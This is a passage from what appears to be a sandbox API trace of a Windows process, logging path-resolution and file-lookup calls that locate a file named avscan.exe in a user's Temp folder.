nFileSizeHigh=0x775d4628, nFileSizeLow=0x114a834, dwReserved0=0x28fa94, dwReserved1=0x5e, cFileName="뽜Tﳘ(p", cAlternateFileName="ꞼĔ꠴Ĕ^")) returned 0xffffffff [0121.118] GetLastError () returned 0x2 [0121.118] SysReAllocStringLen (in: pbstr=0x28fa14*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x28fa14*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 1 [0121.118] SysReAllocStringLen (in: pbstr=0x28fc9c*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", len=0x24 | out: pbstr=0x28fc9c*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 1 [0121.118] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", nBufferLength=0x104, lpBuffer=0x28f524, lpFilePart=0x28f520 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpFilePart=0x28f520*="Temp") returned 0x24 [0121.118] SysReAllocStringLen (in: pbstr=0x28f764*=0x0, psz="C:", len=0x2 | out: pbstr=0x28f764*="C:") returned 1 [0121.119] SysReAllocStringLen (in: pbstr=0x28f720*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f720*="C:\\") returned 1 [0121.119] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0121.119] SysReAllocStringLen (in: pbstr=0x28f71c*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\", len=0x20 | out: pbstr=0x28f71c*="C:\\Users\\KEECFM~1\\AppData\\Local\\") returned 1 [0121.119] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\AppData\\Local\\", cchLength=0x20 | out: lpsz="c:\\users\\keecfm~1\\appdata\\local\\") returned 0x20 [0121.119] SetLastError (dwErrCode=0x0) [0121.119] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\appdata\\local\\", cchCount1=32, lpString2="c:\\", cchCount2=3) returned 3 [0121.119] GetLastError () returned 0x0 [0121.119] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28f788 | out: lpFindFileData=0x28f788*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x70, ftCreationTime.dwHighDateTime=0x28f7a8, ftLastAccessTime.dwLowDateTime=0x775d4557, ftLastAccessTime.dwHighDateTime=0x5e, ftLastWriteTime.dwLowDateTime=0x114b2bc, ftLastWriteTime.dwHighDateTime=0x28f7c0, nFileSizeHigh=0x775d4628, nFileSizeLow=0x114b2bc, dwReserved0=0x28f7dc, dwReserved1=0x5e, cFileName="ꞼĔﳔ(\x0b", cAlternateFileName="댴Ĕ돤ĔH")) returned 0xffffffff [0121.119] GetLastError () returned 0x2 [0121.119] SysReAllocStringLen (in: pbstr=0x28f75c*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\", len=0x20 | out: pbstr=0x28f75c*="C:\\Users\\KEECFM~1\\AppData\\Local\\") returned 1 [0121.120] SysReAllocStringLen (in: pbstr=0x28f9e4*="C:\\Users\\KEECFM~1\\AppData\\Local\\", psz="C:\\Users\\KEECFM~1\\AppData\\Local", len=0x1f | out: pbstr=0x28f9e4*="C:\\Users\\KEECFM~1\\AppData\\Local") returned 1 [0121.120] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local", nBufferLength=0x104, lpBuffer=0x28f26c, lpFilePart=0x28f268 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local", lpFilePart=0x28f268*="Local") returned 0x1f [0121.120] SysReAllocStringLen (in: pbstr=0x28f4ac*=0x0, psz="C:", len=0x2 | out: pbstr=0x28f4ac*="C:") returned 1 [0121.120] SysReAllocStringLen (in: pbstr=0x28f468*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f468*="C:\\") returned 1 [0121.120] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0121.120] SysReAllocStringLen (in: pbstr=0x28f464*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\", len=0x1a | out: pbstr=0x28f464*="C:\\Users\\KEECFM~1\\AppData\\") returned 1 [0121.120] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\AppData\\", cchLength=0x1a | out: lpsz="c:\\users\\keecfm~1\\appdata\\") returned 0x1a [0121.120] SetLastError (dwErrCode=0x0) [0121.120] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\appdata\\", cchCount1=26, lpString2="c:\\", cchCount2=3) returned 3 [0121.120] GetLastError () returned 0x0 [0121.121] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28f4d0 | out: lpFindFileData=0x28f4d0*(dwFileAttributes=0x28f4e8, ftCreationTime.dwLowDateTime=0x775d43cd, ftCreationTime.dwHighDateTime=0x48, ftLastAccessTime.dwLowDateTime=0x15, ftLastAccessTime.dwHighDateTime=0x48, ftLastWriteTime.dwLowDateTime=0x114b38c, ftLastWriteTime.dwHighDateTime=0x28f508, nFileSizeHigh=0x775d4628, nFileSizeLow=0x114b38c, dwReserved0=0x28f524, dwReserved1=0x48, cFileName="댴Ĕ塚(\x0b", cAlternateFileName="됼Ĕ쀤Ĕ>")) returned 0xffffffff [0121.121] GetLastError () returned 0x2 [0121.121] SysReAllocStringLen (in: pbstr=0x28f4a4*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\", len=0x1a | out: pbstr=0x28f4a4*="C:\\Users\\KEECFM~1\\AppData\\") returned 1 [0121.121] SysReAllocStringLen (in: pbstr=0x28f72c*="C:\\Users\\KEECFM~1\\AppData\\", psz="C:\\Users\\KEECFM~1\\AppData", len=0x19 | out: pbstr=0x28f72c*="C:\\Users\\KEECFM~1\\AppData") returned 1 [0121.121] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData", nBufferLength=0x104, lpBuffer=0x28efb4, lpFilePart=0x28efb0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData", lpFilePart=0x28efb0*="AppData") returned 0x19 [0121.122] SysReAllocStringLen (in: pbstr=0x28f1f4*=0x0, psz="C:", len=0x2 | out: pbstr=0x28f1f4*="C:") returned 1 [0121.122] SysReAllocStringLen (in: pbstr=0x28f1b0*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f1b0*="C:\\") returned 1 [0121.122] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0121.122] SysReAllocStringLen (in: pbstr=0x28f1ac*=0x0, psz="C:\\Users\\KEECFM~1\\", len=0x12 | out: pbstr=0x28f1ac*="C:\\Users\\KEECFM~1\\") returned 1 [0121.122] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\", cchLength=0x12 | out: lpsz="c:\\users\\keecfm~1\\") returned 0x12 [0121.122] SetLastError (dwErrCode=0x0) [0121.122] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\", cchCount1=18, lpString2="c:\\", cchCount2=3) returned 3 [0121.122] GetLastError () returned 0x0 [0121.123] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28f218 | out: lpFindFileData=0x28f218*(dwFileAttributes=0x28f3a4, ftCreationTime.dwLowDateTime=0x77ad1ecd, ftCreationTime.dwHighDateTime=0x1ce8fe4, ftLastAccessTime.dwLowDateTime=0xfffffffe, ftLastAccessTime.dwHighDateTime=0x77a8e36c, ftLastWriteTime.dwLowDateTime=0x77a8e0d2, ftLastWriteTime.dwHighDateTime=0x1130000, nFileSizeHigh=0x40, nFileSizeLow=0x1146880, dwReserved0=0x78000, dwReserved1=0x11375c8, cFileName="\n", cAlternateFileName="楤Ĕ検Ĕ2")) returned 0xffffffff [0121.123] GetLastError () returned 0x2 [0121.123] SysReAllocStringLen (in: pbstr=0x28f1ec*=0x0, psz="C:\\Users\\KEECFM~1\\", len=0x12 | out: pbstr=0x28f1ec*="C:\\Users\\KEECFM~1\\") returned 1 [0121.123] SysReAllocStringLen (in: pbstr=0x28f474*="C:\\Users\\KEECFM~1\\", psz="C:\\Users\\KEECFM~1", len=0x11 | out: pbstr=0x28f474*="C:\\Users\\KEECFM~1") returned 1 [0121.123] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1", nBufferLength=0x104, lpBuffer=0x28ecfc, lpFilePart=0x28ecf8 | out: lpBuffer="C:\\Users\\KEECFM~1", lpFilePart=0x28ecf8*="KEECFM~1") returned 0x11 [0121.124] SysReAllocStringLen (in: pbstr=0x28ef3c*=0x0, psz="C:", len=0x2 | out: pbstr=0x28ef3c*="C:") returned 1 [0121.124] SysReAllocStringLen (in: pbstr=0x28eef8*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28eef8*="C:\\") returned 1 [0121.124] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0121.124] SysReAllocStringLen (in: pbstr=0x28eef4*=0x0, psz="C:\\Users\\", len=0x9 | out: pbstr=0x28eef4*="C:\\Users\\") returned 1 [0121.124] CharLowerBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="c:\\users\\") returned 0x9 [0121.124] SetLastError (dwErrCode=0x0) [0121.124] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\", cchCount1=9, lpString2="c:\\", cchCount2=3) returned 3 [0121.124] GetLastError () returned 0x0 [0121.124] FindFirstFileW (in: lpFileName="C:\\Users\\" (normalized: "c:\\users"), lpFindFileData=0x28ef60 | out: lpFindFileData=0x28ef60*(dwFileAttributes=0x28f0ec, ftCreationTime.dwLowDateTime=0x77ad1ecd, ftCreationTime.dwHighDateTime=0x1ce8fe4, ftLastAccessTime.dwLowDateTime=0xfffffffe, ftLastAccessTime.dwHighDateTime=0x77a8e36c, ftLastWriteTime.dwLowDateTime=0x77a8e0d2, ftLastWriteTime.dwHighDateTime=0x1130000, nFileSizeHigh=0x30, nFileSizeLow=0x114b5b0, dwReserved0=0x28efb4, dwReserved1=0x32, cFileName="楤Ĕ(@", cAlternateFileName="뙤Ĕ뗴Ĕ\"")) returned 0xffffffff [0121.125] GetLastError () returned 0x2 [0121.125] SysReAllocStringLen (in: pbstr=0x28ef34*=0x0, psz="C:\\Users\\", len=0x9 | out: pbstr=0x28ef34*="C:\\Users\\") returned 1 [0121.125] SysReAllocStringLen (in: pbstr=0x28f1bc*="C:\\Users\\", psz="C:\\Users", len=0x8 | out: pbstr=0x28f1bc*="C:\\Users") returned 1 [0121.125] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x104, lpBuffer=0x28ea44, lpFilePart=0x28ea40 | out: lpBuffer="C:\\Users", lpFilePart=0x28ea40*="Users") returned 0x8 [0121.126] SysReAllocStringLen (in: pbstr=0x28ec84*=0x0, psz="C:", len=0x2 | out: pbstr=0x28ec84*="C:") returned 1 [0121.126] SysReAllocStringLen (in: pbstr=0x28ec40*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28ec40*="C:\\") returned 1 [0121.126] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0121.126] SysReAllocStringLen (in: pbstr=0x28ec3c*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28ec3c*="C:\\") returned 1 [0121.126] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0121.126] SetLastError (dwErrCode=0x0) [0121.126] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\", cchCount1=3, lpString2="c:\\", cchCount2=3) returned 2 [0121.126] GetLastError () returned 0x0 [0121.126] FindFirstFileW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), lpFindFileData=0x28eca8 | out: lpFindFileData=0x28eca8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28ecfc, dwReserved1=0x22, cFileName="Users", cAlternateFileName="")) returned 0x114c478 [0121.127] FileTimeToLocalFileTime (in: lpFileTime=0x28ecbc, lpLocalFileTime=0x28ec38 | out: lpLocalFileTime=0x28ec38) returned 1 [0121.127] FileTimeToDosDateTime (in: lpFileTime=0x28ec38, lpFatDate=0x28ec8a, lpFatTime=0x28ec88 | out: lpFatDate=0x28ec8a, lpFatTime=0x28ec88) returned 1 [0121.127] FindClose (in: hFindFile=0x114c478 | out: hFindFile=0x114c478) returned 1 [0121.128] SysReAllocStringLen (in: pbstr=0x28f1bc*="C:\\Users", psz="C:\\Users", len=0x8 | out: pbstr=0x28f1bc*="C:\\Users") returned 1 [0121.128] SysReAllocStringLen (in: pbstr=0x28ef2c*=0x0, psz="C:\\Users", len=0x8 | out: pbstr=0x28ef2c*="C:\\Users") returned 1 [0121.128] SysReAllocStringLen (in: pbstr=0x28f1bc*="C:\\Users", psz="C:\\Users\\", len=0x9 | out: pbstr=0x28f1bc*="C:\\Users\\") returned 1 [0121.128] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28ef60 | out: lpFindFileData=0x28ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28efb4, dwReserved1=0x32, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x114c478 [0121.128] FileTimeToLocalFileTime (in: lpFileTime=0x28ef74, lpLocalFileTime=0x28eef0 | out: lpLocalFileTime=0x28eef0) returned 1 [0121.129] FileTimeToDosDateTime (in: lpFileTime=0x28eef0, lpFatDate=0x28ef42, lpFatTime=0x28ef40 | out: lpFatDate=0x28ef42, lpFatTime=0x28ef40) returned 1 [0121.129] FindClose (in: hFindFile=0x114c478 | out: hFindFile=0x114c478) returned 1 [0121.129] SysReAllocStringLen (in: pbstr=0x28f474*="C:\\Users\\KEECFM~1", psz="C:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28f474*="C:\\Users\\kEecfMwgj") returned 1 [0121.130] SysReAllocStringLen (in: pbstr=0x28f1e4*=0x0, psz="C:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28f1e4*="C:\\Users\\kEecfMwgj") returned 1 [0121.130] SysReAllocStringLen (in: pbstr=0x28f474*="C:\\Users\\kEecfMwgj", psz="C:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28f474*="C:\\Users\\kEecfMwgj\\") returned 1 [0121.130] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28f218 | out: lpFindFileData=0x28f218*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x78000, dwReserved1=0x11375c8, cFileName="AppData", cAlternateFileName="")) returned 0x114c478 [0121.130] FileTimeToLocalFileTime (in: lpFileTime=0x28f22c, lpLocalFileTime=0x28f1a8 | out: lpLocalFileTime=0x28f1a8) returned 1 [0121.130] FileTimeToDosDateTime (in: lpFileTime=0x28f1a8, lpFatDate=0x28f1fa, lpFatTime=0x28f1f8 | out: lpFatDate=0x28f1fa, lpFatTime=0x28f1f8) returned 1 [0121.131] FindClose (in: hFindFile=0x114c478 | out: hFindFile=0x114c478) returned 1 [0121.131] SysReAllocStringLen (in: pbstr=0x28f72c*="C:\\Users\\KEECFM~1\\AppData", psz="C:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28f72c*="C:\\Users\\kEecfMwgj\\AppData") returned 1 [0121.131] SysReAllocStringLen (in: pbstr=0x28f49c*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28f49c*="C:\\Users\\kEecfMwgj\\AppData") returned 1 [0121.131] SysReAllocStringLen (in: pbstr=0x28f72c*="C:\\Users\\kEecfMwgj\\AppData", psz="C:\\Users\\kEecfMwgj\\AppData\\", len=0x1b | out: pbstr=0x28f72c*="C:\\Users\\kEecfMwgj\\AppData\\") returned 1 [0121.131] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28f4d0 | out: lpFindFileData=0x28f4d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28f524, dwReserved1=0x48, cFileName="Local", cAlternateFileName="")) returned 0x114c4d0 [0121.132] FileTimeToLocalFileTime (in: lpFileTime=0x28f4e4, lpLocalFileTime=0x28f460 | out: lpLocalFileTime=0x28f460) returned 1 [0121.132] FileTimeToDosDateTime (in: lpFileTime=0x28f460, lpFatDate=0x28f4b2, lpFatTime=0x28f4b0 | out: lpFatDate=0x28f4b2, lpFatTime=0x28f4b0) returned 1 [0121.132] FindClose (in: hFindFile=0x114c4d0 | out: hFindFile=0x114c4d0) returned 1 [0121.133] SysReAllocStringLen (in: pbstr=0x28f9e4*="C:\\Users\\KEECFM~1\\AppData\\Local", psz="C:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28f9e4*="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0121.133] SysReAllocStringLen (in: pbstr=0x28f754*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28f754*="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0121.133] SysReAllocStringLen (in: pbstr=0x28f9e4*="C:\\Users\\kEecfMwgj\\AppData\\Local", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\", len=0x21 | out: pbstr=0x28f9e4*="C:\\Users\\kEecfMwgj\\AppData\\Local\\") returned 1 [0121.133] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), lpFindFileData=0x28f788 | out: lpFindFileData=0x28f788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf38c1580, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf38c1580, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28f7dc, dwReserved1=0x5e, cFileName="Temp", cAlternateFileName="")) returned 0x114c4d0 [0121.133] FileTimeToLocalFileTime (in: lpFileTime=0x28f79c, lpLocalFileTime=0x28f718 | out: lpLocalFileTime=0x28f718) returned 1 [0121.133] FileTimeToDosDateTime (in: lpFileTime=0x28f718, lpFatDate=0x28f76a, lpFatTime=0x28f768 | out: lpFatDate=0x28f76a, lpFatTime=0x28f768) returned 1 [0121.134] FindClose (in: hFindFile=0x114c4d0 | out: hFindFile=0x114c4d0) returned 1 [0121.135] SysReAllocStringLen (in: pbstr=0x28fc9c*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fc9c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0121.135] SysReAllocStringLen (in: pbstr=0x28fa0c*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fa0c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0121.135] SysReAllocStringLen (in: pbstr=0x28fc9c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", len=0x26 | out: pbstr=0x28fc9c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\") returned 1 [0121.135] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe"), lpFindFileData=0x28fa40 | out: lpFindFileData=0x28fa40*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xf38c1580, ftCreationTime.dwHighDateTime=0x1da9884, ftLastAccessTime.dwLowDateTime=0xf38c1580, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf67c4800, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x1442557, dwReserved0=0x28fa94, dwReserved1=0x5e, cFileName="avscan.exe", cAlternateFileName="")) returned 0x114c4d0 [0121.135] FileTimeToLocalFileTime (in: lpFileTime=0x28fa54, lpLocalFileTime=0x28f9d0 | out: lpLocalFileTime=0x28f9d0) returned 1 [0121.135] FileTimeToDosDateTime (in: lpFileTime=0x28f9d0, lpFatDate=0x28fa22, lpFatTime=0x28fa20 | out: lpFatDate=0x28fa22, lpFatTime=0x28fa20) returned 1 [0121.136] FindClose (in: hFindFile=0x114c4d0 | out: hFindFile=0x114c4d0) returned 1 [0121.136] SysReAllocStringLen (in: pbstr=0x28fdb0*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\avscan.exe", len=0x30 | out: pbstr=0x28fdb0*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\avscan.exe") returned 1 [0121.136] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\avscan.exe", len=0x30 | out: pbstr=0x28fcc0*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\avscan.exe") returned 1 [0121.136] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\avscan.exe", cchLength=0x30 | out: lpsz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe") returned 0x30 [0121.137] SysReAllocStringLen (in: pbstr=0x28fdb0*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\avscan.exe", psz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe", len=0x30 | out: pbstr=0x28fdb0*="c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe") returned 1 [0121.137] SysReAllocStringLen (in: pbstr=0x33325a8*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", psz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe", len=0x30 | out: pbstr=0x33325a8*="c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe") returned 1 [0121.137] SysReAllocStringLen (in: pbstr=0x33325b8*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", len=0x26 | out: pbstr=0x33325b8*="c:\\users\\keecfmwgj\\appdata\\local\\temp\\") returned 1 [0121.137] SysReAllocStringLen (in: pbstr=0x28fda4*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", len=0x26 | out: pbstr=0x28fda4*="c:\\users\\keecfmwgj\\appdata\\local\\temp\\") returned 1 [0121.137] SysReAllocStringLen (in: pbstr=0x28fda8*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", len=0x26 | out: pbstr=0x28fda8*="c:\\users\\keecfmwgj\\appdata\\local\\temp\\") returned 1 [0121.137] GetThreadLocale () returned 0x409 [0121.137] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0121.137] GetThreadLocale () returned 0x409 [0121.138] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0121.138] GetFullPathNameW (in: lpFileName="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", lpFilePart=0x28fa90*=0x0) returned 0x26 [0121.138] SysReAllocStringLen (in: pbstr=0x28fda8*="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", psz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", len=0x26 | out: pbstr=0x28fda8*="c:\\users\\keecfmwgj\\appdata\\local\\temp\\") returned 1 [0121.138] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", len=0x26 | out: pbstr=0x28fcc0*="c:\\users\\keecfmwgj\\appdata\\local\\temp\\") returned 1 [0121.138] CharLowerBuffW (in: lpsz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", cchLength=0x26 | out: lpsz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\") returned 0x26 [0121.138] SysReAllocStringLen (in: pbstr=0x28fda8*="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", psz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", len=0x26 | out: pbstr=0x28fda8*="c:\\users\\keecfmwgj\\appdata\\local\\temp\\") returned 1 [0121.138] SysReAllocStringLen (in: pbstr=0x33325b8*="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", psz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", len=0x26 | out: pbstr=0x33325b8*="c:\\users\\keecfmwgj\\appdata\\local\\temp\\") returned 1 [0121.138] GetTempPathW (in: nBufferLength=0xfffe, lpBuffer=0x3341c98 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25 [0121.138] SysReAllocStringLen (in: pbstr=0x28fd9c*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x28fd9c*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 1 [0121.138] SysReAllocStringLen (in: pbstr=0x28fda0*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x28fda0*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 1 [0121.138] GetThreadLocale () returned 0x409 [0121.139] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0121.139] GetThreadLocale () returned 0x409 [0121.139] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0121.139] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", lpFilePart=0x28fa90*=0x0) returned 0x25 [0121.139] SysReAllocStringLen (in: pbstr=0x28fda0*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x28fda0*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 1 [0121.139] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", nBufferLength=0x104, lpBuffer=0x28f7dc, lpFilePart=0x28f7d8 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", lpFilePart=0x28f7d8*=0x0) returned 0x25 [0121.140] SysReAllocStringLen (in: pbstr=0x28fa1c*=0x0, psz="C:", len=0x2 | out: pbstr=0x28fa1c*="C:") returned 1 [0121.140] SysReAllocStringLen (in: pbstr=0x28f9d8*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f9d8*="C:\\") returned 1 [0121.140] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: 